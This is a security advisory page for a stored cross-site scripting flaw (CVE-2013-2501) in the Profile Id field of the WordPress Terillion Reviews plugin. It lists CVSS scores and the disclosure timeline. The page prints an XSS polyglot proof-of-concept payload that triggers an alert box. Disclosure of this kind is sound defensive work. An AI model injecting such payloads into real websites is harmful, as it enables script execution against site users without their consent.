WordPress Terillion Reviews Cross Site Scripting

2013.03.12
Credit: Aditya Balapure
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2013-2501
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

CVE Assigned-CVE-2013-2501 ############################# Exploit Title : Stored XSS in Terillion Reviews Plugin Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 08/03/13 Software link: http://wordpress.org/extend/plugins/terillion-reviews/ ############################# The Terillion Reviews Plugin in Wordpress http://wordpress.org/extend/plugins/terillion-reviews/ has a Stored XSS Vulnerability in the Profile Id input box. PoC Script Used Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> Vendor Notification 20/02/2013 - Vendor notified awaiting action 07/03/2013 - Removed from the Wordpress Repository

References:

http://adityabalapure.blogspot.in/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top